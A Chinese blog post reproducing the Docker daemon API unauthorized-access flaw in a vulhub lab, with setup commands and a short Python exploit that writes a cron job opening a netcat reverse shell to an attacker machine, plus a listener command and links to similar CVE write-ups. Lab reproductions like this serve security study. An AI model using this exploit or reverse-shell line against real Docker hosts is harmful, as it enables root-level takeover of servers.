docker daemon api 未授權訪問漏洞復現

原創 whojoe 2020-07-04 00:41

docker daemon api 未授權訪問漏洞復現+

環境搭建

啓動docker

systemctl start docker

獲取vulhub

git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git

進入對應目錄

cd vulhub/docker/unauthorized-rce/

啓動容器

docker-compose up -d

查看容器

docker ps

在這裏插入圖片描述
這裏的訪問http://127.0.0.1:2375/version
在這裏插入圖片描述
這裏kali的ip192.138.164.134
centos的ip192.168.42.133
exp.py

import docker

client = docker.DockerClient(base_url='http://192.168.42.133:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc 192.168.42.134 4444 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

在kali啓動監聽

nc -lvvp 4444

在這裏插入圖片描述

參考文章

https://github.com/vulhub/vulhub/blob/master/docker/unauthorized-rce/README.zh-cn.md

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Apache solr xxe漏洞復現(CVE-2017-12629)

Apache solr xxe漏洞復現(CVE-2017-12629)前言環境搭建漏洞復現參考文章 前言 影響版本 Apache Solr < 7.1 Apache Lucene < 7.1 環境搭建 啓動docker syste

whojoe 2020-07-07 23:32:01

Apache Solr 遠程命令執行漏洞復現(CVE-2017-12629)

Apache Solr 遠程命令執行漏洞復現(CVE-2017-12629)前言環境搭建漏洞復現參考文章 前言 影響版本 Apache Solr < 7.1 Apache Lucene < 7.1 環境搭建 啓動docker sy

whojoe 2020-07-07 23:32:01

Apache Solr rce復現(CVE-2019-0193)

Apache Solr rce復現(CVE-2019-0193)前言環境搭建漏洞復現參考文章 前言 影響版本 Apache Solr < 8.2.0 環境搭建 啓動docker systemctl start docker 獲取

whojoe 2020-07-07 23:32:01

(有下載鏈接)F5 BIG-IP 遠程代碼執行漏洞復現(CVE-2020-5902)

F5 BIG-IP 遠程代碼執行漏洞復現(CVE-2020-5902)前言漏洞詳情影響版本修復建議環境搭建漏洞復現參考文章 前言 漏洞詳情 F5 BIG-IP 是美國F5公司一款集成流量管理、DNS、出入站規則、web應用防火牆、

whojoe 2020-07-06 23:41:30

Apache Solr 遠程命令執行漏洞(CVE-2019-12409)

Apache Solr 遠程命令執行漏洞(CVE-2019-12409)前言環境搭建漏洞復現參考文章 前言 影響Apache Solr 8.1.1到8.2.0版本 環境搭建 啓動docker systemctl start doc

whojoe 2020-07-06 23:00:48

Apache Solr Velocity遠程命令執行漏洞(CVE-2019-17558)

Apache Solr Velocity遠程命令執行漏洞(CVE-2019-17558)前言環境搭建漏洞復現參考文章 前言 影響Apache Solr 8.1.1到8.2.0版本 環境搭建 啓動docker systemctl s

whojoe 2020-07-06 23:00:48

weblogic CVE-2020-2555 反序列化RCE 復現

文章目錄前言0x01 漏洞說明0x02 影響版本0x03 漏洞利用0x04 注意的地方0x05 修復建議0x06 時間線0x07 參考鏈接 前言 本教程及工具僅供技術學習交流、請勿用於非法行爲、否則後果自負 0x01 漏洞說明

iptableskk 2020-07-06 21:25:57

Windows SMBv3 漏洞復現(CVE-2020-0796)

Windows SMBv3 漏洞復現(CVE-2020-0796)前言環境搭建漏洞復現參考文章 前言 漏洞介紹 微軟SMBv3 Client/Server遠程代碼執行漏洞CVE-2020-0796 影響範圍: Windows 10

whojoe 2020-07-06 05:35:41

Supervisord 遠程命令執行漏洞(CVE-2017-11610)

Supervisord 遠程命令執行漏洞(CVE-2017-11610) 一、漏洞介紹 Supervisord是一款用Python語言開發的管理後臺應用(服務)的工具,方便運維人員使用圖形化界面進行管理。 Supervisord曾

limb0 2020-07-05 19:14:36

Drupal Drupalgeddon 2 遠程代碼執行漏洞(CVE-2018-7600)

Drupal Drupalgeddon 2 遠程代碼執行漏洞(CVE-2018-7600) 一、漏洞介紹 2018年3月28日,Drupal官方發佈新補丁和安全公告,宣稱Drupal 6,7,8等多個子版本存在遠程代碼執行漏洞,攻

limb0 2020-07-05 19:14:36

Apache Tomcat文件包含漏洞復現(CVE-2020-1938)

Apache Tomcat文件包含漏洞復現(CVE-2020-1938)前言影響編號環境搭建漏洞復現參考文章 前言 影響 Apache Tomcat = 6 7 <= Apache Tomcat <7.0.100

whojoe 2020-07-05 14:51:22

CVE-­2020­-0796(永恆之黑)漏洞復現Getshell

MySQL數據庫從入門到實戰應用 CVE-­2020­-0796漏洞復現CVE-­2020­-0796受影響的系統版本環境搭建漏洞檢測-掃描漏洞復現-返回會話漏洞復現-藍屏攻擊視頻演示漏洞修復 CVE-­2020­-0796

小陈classmate 2020-07-05 14:10:43

Solr漏洞 CVE-2019-17558漏洞復現

CVE-2019-17558漏洞復現前言 Apache Solr 是一個開源的搜索服務器。 cve-2019-17558 Apache Solr 代碼注入漏洞 漏洞影響版本5.0.0 到 8.3.1 漏洞影響:用戶可以注入自定

小陈classmate 2020-07-05 14:10:42

Drupal 遠程代碼執行漏洞(CVE-2019-6339)

Drupal 遠程代碼執行漏洞(CVE-2019-6339) 一、漏洞介紹 Drupal core是Drupal社區所維護的一套用PHP語言開發的免費、開源的內容管理系統。 Drupal core 7.62之前的7.x版本、8.6

limb0 2020-07-04 12:23:17

CVE-2020-1948補丁繞過 Apache Dubbo 遠程代碼執行漏洞

漏洞背景 2020年06月23日, 360CERT監測發現 Apache Dubbo 官方 發佈了 Apache Dubbo 遠程代碼執行 的風險通告,該漏洞編號爲 CVE-2020-1948,漏洞等級:高危。 Apache Du

AmyBaby囍 2020-07-04 11:53:11